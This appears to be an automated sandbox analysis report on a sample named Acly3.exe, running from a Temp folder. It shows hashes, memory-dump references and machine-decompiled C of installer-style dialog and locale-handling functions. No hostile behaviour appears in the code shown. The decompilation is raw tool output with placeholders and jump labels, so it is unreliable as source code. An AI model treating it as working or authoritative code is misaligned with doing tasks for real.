                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 2564846305-813528018
                                                                            • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                            • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                            • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                            • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                            			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                            				struct HWND__* _v28;
                                                                            				void* _v84;
                                                                            				void* _v88;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t34;
                                                                            				signed int _t36;
                                                                            				signed int _t38;
                                                                            				struct HWND__* _t48;
                                                                            				signed int _t67;
                                                                            				struct HWND__* _t73;
                                                                            				signed int _t86;
                                                                            				struct HWND__* _t91;
                                                                            				signed int _t99;
                                                                            				int _t103;
                                                                            				signed int _t117;
                                                                            				int _t118;
                                                                            				int _t122;
                                                                            				signed int _t124;
                                                                            				struct HWND__* _t127;
                                                                            				struct HWND__* _t128;
                                                                            				int _t129;
                                                                            				intOrPtr _t130;
                                                                            				long _t133;
                                                                            				int _t135;
                                                                            				int _t136;
                                                                            				void* _t137;
                                                                            
                                                                            				_t130 = _a8;
                                                                            				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                            					_t34 = _a12;
                                                                            					_t127 = _a4;
                                                                            					__eflags = _t130 - 0x110;
                                                                            					 *0x42d250 = _t34;
                                                                            					if(_t130 == 0x110) {
                                                                            						 *0x434f08 = _t127;
                                                                            						 *0x42d264 = GetDlgItem(_t127, 1);
                                                                            						_t91 = GetDlgItem(_t127, 2);
                                                                            						_push(0xffffffff);
                                                                            						_push(0x1c);
                                                                            						 *0x42b230 = _t91;
                                                                            						E00404499(_t127);
                                                                            						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                                            						 *0x433ecc = E0040140B(4);
                                                                            						_t34 = 1;
                                                                            						__eflags = 1;
                                                                            						 *0x42d250 = 1;
                                                                            					}
                                                                            					_t124 =  *0x40a368; // 0xffffffff
                                                                            					_t136 = 0;
                                                                            					_t133 = (_t124 << 6) +  *0x434f20;
                                                                            					__eflags = _t124;
                                                                            					if(_t124 < 0) {
                                                                            						L36:
                                                                            						E004044E5(0x40b);
                                                                            						while(1) {
                                                                            							_t36 =  *0x42d250;
                                                                            							 *0x40a368 =  *0x40a368 + _t36;
                                                                            							_t133 = _t133 + (_t36 << 6);
                                                                            							_t38 =  *0x40a368; // 0xffffffff
                                                                            							__eflags = _t38 -  *0x434f24;
                                                                            							if(_t38 ==  *0x434f24) {
                                                                            								E0040140B(1);
                                                                            							}
                                                                            							__eflags =  *0x433ecc - _t136;
                                                                            							if( *0x433ecc != _t136) {
                                                                            								break;
                                                                            							}
                                                                            							__eflags =  *0x40a368 -  *0x434f24; // 0xffffffff
                                                                            							if(__eflags >= 0) {
                                                                            								break;
                                                                            							}
                                                                            							_t117 =  *(_t133 + 0x14);
                                                                            							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                            							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                            							_push(0xfffffc19);
                                                                            							E00404499(_t127);
                                                                            							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                            							_push(0xfffffc1b);
                                                                            							E00404499(_t127);
                                                                            							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                            							_push(0xfffffc1a);
                                                                            							E00404499(_t127);
                                                                            							_t48 = GetDlgItem(_t127, 3);
                                                                            							__eflags =  *0x434f8c - _t136;
                                                                            							_v28 = _t48;
                                                                            							if( *0x434f8c != _t136) {
                                                                            								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                            								__eflags = _t117;
                                                                            							}
                                                                            							ShowWindow(_t48, _t117 & 0x00000008);
                                                                            							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                                                            							E004044BB(_t117 & 0x00000002);
                                                                            							_t118 = _t117 & 0x00000004;
                                                                            							EnableWindow( *0x42b230, _t118);
                                                                            							__eflags = _t118 - _t136;
                                                                            							if(_t118 == _t136) {
                                                                            								_push(1);
                                                                            							} else {
                                                                            								_push(_t136);
                                                                            							}
                                                                            							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                            							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                            							__eflags =  *0x434f8c - _t136;
                                                                            							if( *0x434f8c == _t136) {
                                                                            								_push( *0x42d264);
                                                                            							} else {
                                                                            								SendMessageW(_t127, 0x401, 2, _t136);
                                                                            								_push( *0x42b230);
                                                                            							}
                                                                            							E004044CE();
                                                                            							E0040653D(0x42d268, E00403F7B());
                                                                            							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                            							SetWindowTextW(_t127, 0x42d268);
                                                                            							_push(_t136);
                                                                            							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                            							__eflags = _t67;
                                                                            							if(_t67 != 0) {
                                                                            								continue;
                                                                            							} else {
                                                                            								__eflags =  *_t133 - _t136;
                                                                            								if( *_t133 == _t136) {
                                                                            									continue;
                                                                            								}
                                                                            								__eflags =  *(_t133 + 4) - 5;
                                                                            								if( *(_t133 + 4) != 5) {
                                                                            									DestroyWindow( *0x433ed8);
                                                                            									 *0x42c240 = _t133;
                                                                            									__eflags =  *_t133 - _t136;
                                                                            									if( *_t133 <= _t136) {
                                                                            										goto L60;
                                                                            									}
                                                                            									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133);
                                                                            									__eflags = _t73 - _t136;
                                                                            									 *0x433ed8 = _t73;
                                                                            									if(_t73 == _t136) {
                                                                            										goto L60;
                                                                            									}
                                                                            									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                            									_push(6);
                                                                            									E00404499(_t73);
                                                                            									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                            									ScreenToClient(_t127, _t137 + 0x10);
                                                                            									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                            									_push(_t136);
                                                                            									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                            									__eflags =  *0x433ecc - _t136;
                                                                            									if( *0x433ecc != _t136) {
                                                                            										goto L63;
                                                                            									}
                                                                            									ShowWindow( *0x433ed8, 8);
                                                                            									E004044E5(0x405);
                                                                            									goto L60;
                                                                            								}
                                                                            								__eflags =  *0x434f8c - _t136;
                                                                            								if( *0x434f8c != _t136) {
                                                                            									goto L63;
                                                                            								}
                                                                            								__eflags =  *0x434f80 - _t136;
                                                                            								if( *0x434f80 != _t136) {
                                                                            									continue;
                                                                            								}
                                                                            								goto L63;
                                                                            							}
                                                                            						}
                                                                            						DestroyWindow( *0x433ed8);
                                                                            						 *0x434f08 = _t136;
                                                                            						EndDialog(_t127,  *0x42ba38);
                                                                            						goto L60;
                                                                            					} else {
                                                                            						__eflags = _t34 - 1;
                                                                            						if(_t34 != 1) {
                                                                            							L35:
                                                                            							__eflags =  *_t133 - _t136;
                                                                            							if( *_t133 == _t136) {
                                                                            								goto L63;
                                                                            							}
                                                                            							goto L36;
                                                                            						}
                                                                            						_push(0);
                                                                            						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                            						__eflags = _t86;
                                                                            						if(_t86 == 0) {
                                                                            							goto L35;
                                                                            						}
                                                                            						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                                            						__eflags =  *0x433ecc;
                                                                            						return 0 |  *0x433ecc == 0x00000000;
                                                                            					}
                                                                            				} else {
                                                                            					_t127 = _a4;
                                                                            					_t136 = 0;
                                                                            					if(_t130 == 0x47) {
                                                                            						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                                            					}
                                                                            					_t122 = _a12;
                                                                            					if(_t130 != 5) {
                                                                            						L8:
                                                                            						if(_t130 != 0x40d) {
                                                                            							__eflags = _t130 - 0x11;
                                                                            							if(_t130 != 0x11) {
                                                                            								__eflags = _t130 - 0x111;
                                                                            								if(_t130 != 0x111) {
                                                                            									goto L28;
                                                                            								}
                                                                            								_t135 = _t122 & 0x0000ffff;
                                                                            								_t128 = GetDlgItem(_t127, _t135);
                                                                            								__eflags = _t128 - _t136;
                                                                            								if(_t128 == _t136) {
                                                                            									L15:
                                                                            									__eflags = _t135 - 1;
                                                                            									if(_t135 != 1) {
                                                                            										__eflags = _t135 - 3;
                                                                            										if(_t135 != 3) {
                                                                            											_t129 = 2;
                                                                            											__eflags = _t135 - _t129;
                                                                            											if(_t135 != _t129) {
                                                                            												L27:
                                                                            												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                                            												goto L28;
                                                                            											}
                                                                            											__eflags =  *0x434f8c - _t136;
                                                                            											if( *0x434f8c == _t136) {
                                                                            												_t99 = E0040140B(3);
                                                                            												__eflags = _t99;
                                                                            												if(_t99 != 0) {
                                                                            													goto L28;
                                                                            												}
                                                                            												 *0x42ba38 = 1;
                                                                            												L23:
                                                                            												_push(0x78);
                                                                            												L24:
                                                                            												E00404472();
                                                                            												goto L28;
                                                                            											}
                                                                            											E0040140B(_t129);
                                                                            											 *0x42ba38 = _t129;
                                                                            											goto L23;
                                                                            										}
                                                                            										__eflags =  *0x40a368 - _t136; // 0xffffffff
                                                                            										if(__eflags <= 0) {
                                                                            											goto L27;
                                                                            										}
                                                                            										_push(0xffffffff);
                                                                            										goto L24;
                                                                            									}
                                                                            									_push(_t135);
                                                                            									goto L24;
                                                                            								}
                                                                            								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                            								_t103 = IsWindowEnabled(_t128);
                                                                            								__eflags = _t103;
                                                                            								if(_t103 == 0) {
                                                                            									L63:
                                                                            									return 0;
                                                                            								}
                                                                            								goto L15;
                                                                            							}
                                                                            							SetWindowLongW(_t127, _t136, _t136);
                                                                            							return 1;
                                                                            						}
                                                                            						DestroyWindow( *0x433ed8);
                                                                            						 *0x433ed8 = _t122;
                                                                            						L60:
                                                                            						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                                                                            							ShowWindow(_t127, 0xa);
                                                                            							 *0x42f268 = 1;
                                                                            						}
                                                                            						goto L63;
                                                                            					} else {
                                                                            						asm("sbb eax, eax");
                                                                            						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                                            						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                            							L28:
                                                                            							return E00404500(_a8, _t122, _a16);
                                                                            						} else {
                                                                            							ShowWindow(_t127, 4);
                                                                            							goto L8;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                            • ShowWindow.USER32(?), ref: 00403FF6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                            • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                            • DestroyWindow.USER32 ref: 00404035
                                                                            • SetWindowLongW.USER32 ref: 0040404E
                                                                            • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                            • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                            • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                            • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                            • EnableWindow.USER32(?,?), ref: 00404281
                                                                            • EnableWindow.USER32(?,?), ref: 0040429C
                                                                            • GetSystemMenu.USER32 ref: 004042B2
                                                                            • EnableMenuItem.USER32 ref: 004042B9
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                            • SetWindowTextW.USER32 ref: 00404322
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                            • String ID:
                                                                            • API String ID: 1860320154-0
                                                                            • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                            • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                            • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                            • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                            			E00403BEC(void* __eflags) {
                                                                            				intOrPtr _v4;
                                                                            				intOrPtr _v8;
                                                                            				int _v12;
                                                                            				void _v16;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr* _t22;
                                                                            				void* _t30;
                                                                            				void* _t32;
                                                                            				int _t33;
                                                                            				void* _t36;
                                                                            				int _t39;
                                                                            				int _t40;
                                                                            				int _t44;
                                                                            				short _t63;
                                                                            				WCHAR* _t65;
                                                                            				signed char _t69;
                                                                            				WCHAR* _t76;
                                                                            				intOrPtr _t82;
                                                                            				WCHAR* _t87;
                                                                            
                                                                            				_t82 =  *0x434f10;
                                                                            				_t22 = E0040690A(2);
                                                                            				_t90 = _t22;
                                                                            				if(_t22 == 0) {
                                                                            					_t76 = 0x42d268;
                                                                            					L"1033" = 0x30;
                                                                            					 *0x442002 = 0x78;
                                                                            					 *0x442004 = 0;
                                                                            					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                                            					__eflags =  *0x42d268;
                                                                            					if(__eflags == 0) {
                                                                            						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                                            					}
                                                                            					lstrcatW(L"1033", _t76);
                                                                            				} else {
                                                                            					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                                            				}
                                                                            				E00403EC2(_t78, _t90);
                                                                            				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                                            				 *0x434f9c = 0x10000;
                                                                            				if(E00405F14(_t90, 0x440800) != 0) {
                                                                            					L16:
                                                                            					if(E00405F14(_t98, 0x440800) == 0) {
                                                                            						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
                                                                            					}
                                                                            					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040);
                                                                            					 *0x433ee8 = _t30;
                                                                            					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                            						L21:
                                                                            						if(E0040140B(0) == 0) {
                                                                            							_t32 = E00403EC2(_t78, __eflags);
                                                                            							__eflags =  *0x434fa0;
                                                                            							if( *0x434fa0 != 0) {
                                                                            								_t33 = E00405672(_t32, 0);
                                                                            								__eflags = _t33;
                                                                            								if(_t33 == 0) {
                                                                            									E0040140B(1);
                                                                            									goto L33;
                                                                            								}
                                                                            								__eflags =  *0x433ecc;
                                                                            								if( *0x433ecc == 0) {
                                                                            									E0040140B(2);
                                                                            								}
                                                                            								goto L22;
                                                                            							}
                                                                            							ShowWindow( *0x42d248, 5);
                                                                            							_t39 = E0040689A("RichEd20");
                                                                            							__eflags = _t39;
                                                                            							if(_t39 == 0) {
                                                                            								E0040689A("RichEd32");
                                                                            							}
                                                                            							_t87 = L"RichEdit20W";
                                                                            							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                                            							__eflags = _t40;
                                                                            							if(_t40 == 0) {
                                                                            								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                                            								 *0x433ec4 = _t87;
                                                                            								RegisterClassW(0x433ea0);
                                                                            							}
                                                                            							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0);
                                                                            							E00403B3C(E0040140B(5), 1);
                                                                            							return _t44;
                                                                            						}
                                                                            						L22:
                                                                            						_t36 = 2;
                                                                            						return _t36;
                                                                            					} else {
                                                                            						_t78 =  *0x434f00;
                                                                            						 *0x433ea4 = E00401000;
                                                                            						 *0x433eb0 =  *0x434f00;
                                                                            						 *0x433eb4 = _t30;
                                                                            						 *0x433ec4 = 0x40a380;
                                                                            						if(RegisterClassW(0x433ea0) == 0) {
                                                                            							L33:
                                                                            							__eflags = 0;
                                                                            							return 0;
                                                                            						}
                                                                            						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                            						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                                            						goto L21;
                                                                            					}
                                                                            				} else {
                                                                            					_t78 =  *(_t82 + 0x48);
                                                                            					_t92 = _t78;
                                                                            					if(_t78 == 0) {
                                                                            						goto L16;
                                                                            					}
                                                                            					_t76 = 0x432ea0;
                                                                            					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                                            					_t63 =  *0x432ea0; // 0x43
                                                                            					if(_t63 == 0) {
                                                                            						goto L16;
                                                                            					}
                                                                            					if(_t63 == 0x22) {
                                                                            						_t76 = 0x432ea2;
                                                                            						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                                            					}
                                                                            					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                            					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                            						L15:
                                                                            						E0040653D(0x440800, E00405E0C(_t76));
                                                                            						goto L16;
                                                                            					} else {
                                                                            						_t69 = GetFileAttributesW(_t76);
                                                                            						if(_t69 == 0xffffffff) {
                                                                            							L14:
                                                                            							E00405E58(_t76);
                                                                            							goto L15;
                                                                            						}
                                                                            						_t98 = _t69 & 0x00000010;
                                                                            						if((_t69 & 0x00000010) != 0) {
                                                                            							goto L15;
                                                                            						}
                                                                            						goto L14;
                                                                            					}
                                                                            				}
                                                                            			}

























                                                                            APIs
                                                                              • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                              • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                            • lstrcatW.KERNEL32 ref: 00403C6D
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,?,?,?,C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74EDD4C4), ref: 00403CED
                                                                            • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\Acly3.exe,?,?,?,C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\Acly3.exe,?,00000000,?), ref: 00403D0B
                                                                            • LoadImageW.USER32 ref: 00403D54
                                                                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                            • RegisterClassW.USER32 ref: 00403D91
                                                                            • SystemParametersInfoW.USER32 ref: 00403DA9
                                                                            • CreateWindowExW.USER32 ref: 00403DDE
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403E14
                                                                            • GetClassInfoW.USER32 ref: 00403E40
                                                                            • GetClassInfoW.USER32 ref: 00403E4D
                                                                            • RegisterClassW.USER32 ref: 00403E56
                                                                            • DialogBoxParamW.USER32 ref: 00403E75
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Acly3.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 1975747703-2609713073
                                                                            • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                            • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                            • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                            • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                            				intOrPtr _v8;
                                                                            				int _v12;
                                                                            				void* _v16;
                                                                            				struct HWND__* _t56;
                                                                            				signed int _t75;
                                                                            				signed short* _t76;
                                                                            				signed short* _t78;
                                                                            				long _t92;
                                                                            				int _t103;
                                                                            				signed int _t110;
                                                                            				intOrPtr _t113;
                                                                            				WCHAR* _t114;
                                                                            				signed int* _t116;
                                                                            				WCHAR* _t117;
                                                                            				struct HWND__* _t118;
                                                                            
                                                                            				if(_a8 != 0x110) {
                                                                            					if(_a8 != 0x111) {
                                                                            						L13:
                                                                            						if(_a8 != 0x4e) {
                                                                            							if(_a8 == 0x40b) {
                                                                            								 *0x42b234 =  *0x42b234 + 1;
                                                                            							}
                                                                            							L27:
                                                                            							_t114 = _a16;
                                                                            							L28:
                                                                            							return E00404500(_a8, _a12, _t114);
                                                                            						}
                                                                            						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                            						_t114 = _a16;
                                                                            						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                            							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                            							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                            							_v12 = _t103;
                                                                            							_v16 = _t113;
                                                                            							_v8 = 0x432ea0;
                                                                            							if(_t103 - _t113 < 0x800) {
                                                                            								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                            								SetCursor(LoadCursorW(0, 0x7f02));
                                                                            								_push(1);
                                                                            								E00404907(_a4, _v8);
                                                                            								SetCursor(LoadCursorW(0, 0x7f00));
                                                                            								_t114 = _a16;
                                                                            							}
                                                                            						}
                                                                            						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                            							goto L28;
                                                                            						} else {
                                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                            								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                                            							}
                                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                            								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                                            							}
                                                                            							return 1;
                                                                            						}
                                                                            					}
                                                                            					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                                            						goto L27;
                                                                            					} else {
                                                                            						_t116 =  *0x42c240 + 0x14;
                                                                            						if(( *_t116 & 0x00000020) == 0) {
                                                                            							goto L27;
                                                                            						}
                                                                            						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                            						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                            						E004048E3();
                                                                            						goto L13;
                                                                            					}
                                                                            				}
                                                                            				_t117 = _a16;
                                                                            				_t75 =  *(_t117 + 0x30);
                                                                            				if(_t75 < 0) {
                                                                            					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                                                                            				}
                                                                            				_t76 =  *0x434f38 + _t75 * 2;
                                                                            				_t110 =  *_t76 & 0x0000ffff;
                                                                            				_a8 = _t110;
                                                                            				_t78 =  &(_t76[1]);
                                                                            				_a16 = _t78;
                                                                            				_v16 = _t78;
                                                                            				_v12 = 0;
                                                                            				_v8 = E00404609;
                                                                            				if(_t110 != 2) {
                                                                            					_v8 = E004045CF;
                                                                            				}
                                                                            				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                            				_push(0x22);
                                                                            				E00404499(_a4);
                                                                            				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                            				_push(0x23);
                                                                            				E00404499(_a4);
                                                                            				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                            				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                            				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                            				E004044CE(_t118);
                                                                            				SendMessageW(_t118, 0x45b, 1, 0);
                                                                            				_t92 =  *( *0x434f10 + 0x68);
                                                                            				if(_t92 < 0) {
                                                                            					_t92 = GetSysColor( ~_t92);
                                                                            				}
                                                                            				SendMessageW(_t118, 0x443, 0, _t92);
                                                                            				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                            				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                            				 *0x42b234 = 0;
                                                                            				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                            				 *0x42b234 = 0;
                                                                            				return 0;
                                                                            			}


                                                                            APIs
                                                                            • CheckDlgButton.USER32 ref: 004046F6
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                            • GetSysColor.USER32 ref: 00404738
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                            • lstrlenW.KERNEL32(?), ref: 00404759
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                            • SendMessageW.USER32(00000000), ref: 004047DB
